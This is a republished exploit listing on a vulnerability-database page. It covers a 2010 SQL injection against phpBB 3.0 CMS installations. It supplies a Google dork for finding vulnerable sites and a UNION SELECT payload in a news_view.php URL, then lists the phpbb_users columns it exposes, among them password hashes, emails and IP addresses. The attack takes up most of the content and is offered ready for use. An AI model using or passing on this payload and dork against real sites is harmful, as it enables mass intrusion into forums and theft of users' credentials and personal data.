Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

PHPBB 3.0.* CMS SQL Injection Vulnerability

🗓️ 27 Aug 2010 00:00:00Reported by Un-DeadType 
zdt
 zdt🔗 0day.today👁 33 Views

PHPBB 3.0.* CMS SQL Injection Vulnerability, gain detailed database information, exploi

Code
===========================================
PHPBB 3.0.* CMS SQL Injection Vulnerability
===========================================

# Exploit Title: PHPBB 3.0.* CMS SQLinjection

 

# Date: 2010-08-27

 

# Team: eX.ploit ( Abjects #ex.ploit )

 

# Software Link: http://www.phpbb.com/

 

# Version: PHPBB3.0.* CMS only (does not work on FORUM only)

 

# Tested on: Linux

 

# Usage: SQLinjection

 

# Gain detailed database information

 

# Code:

 

 Google dork:[inurl:mypage.php?id= & "Powered by phpBB"]

# Tested on:linux/php 

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ BUG @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

 

Url| http://www.website.com/news_view.php?id=1

 
Vuln: http://www.website.com/news_view.php?id=1+and+1=0+ Union Select   UNHEX(HEX([visible]))  ,2,3,4

 

 

 

Returns

 

Columns: Table phpbb_users

 

                user_type

 

                group_id

 

                user_permissions

 

                user_perm_from

 

                user_ip

 

                user_regdate

 

                username

 

                username_clean

 

                user_password

 

                user_passchg

 

                user_pass_convert

 

                user_email

 

                user_email_hash

 

                user_birthday

 

                user_lastvisit

 

                user_lastmark

 

                user_lastpost_time

 

                user_lastpage

 

                user_last_confirm_key

 

                user_last_search

 

                user_warnings

 

                user_last_warning

 

                user_login_attempts

 

                user_inactive_reason

 

                user_inactive_time

 

                user_posts

 

                user_lang

 

                user_timezone

 

                user_dst

 

                user_dateformat

 

                user_style

 

                user_rank

 

                user_colour

 

                user_new_privmsg

 

                user_unread_privmsg

 

                user_last_privmsg

 

                user_message_rules

 

                user_full_folder

 

                user_emailtime

 

                user_topic_show_days

 

                user_topic_sortby_type

 

                user_topic_sortby_dir

 

                user_post_show_days

 

                user_post_sortby_type

 

                user_post_sortby_dir

 

                user_notify

 

                user_notify_pm

 

                user_notify_type

 

                user_allow_pm

 

                user_allow_viewonline

 

                user_allow_viewemail

 

                user_allow_massemail

 

                user_options

 

                user_avatar

 

                user_avatar_type

 

                user_avatar_width

 

                user_avatar_height

 

                user_sig

 

                user_sig_bbcode_uid

 

                user_sig_bbcode_bitfield

 

                user_from

 

                user_icq

 

                user_aim

 

                user_yim

 

                user_msnm

 

                user_jabber

 

                user_website

 

                user_occ

 

                user_interests

 

                user_actkey

 

                user_newpasswd

 

                user_form_salt

 

 

-------------------



#  0day.today [2018-02-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Aug 2010 00:00Current
7.1High risk
Vulners AI Score7.1
phpbb 3.0cmssql injectionlinuxwebsite.comvulnerabilityexploitdetailed database information
33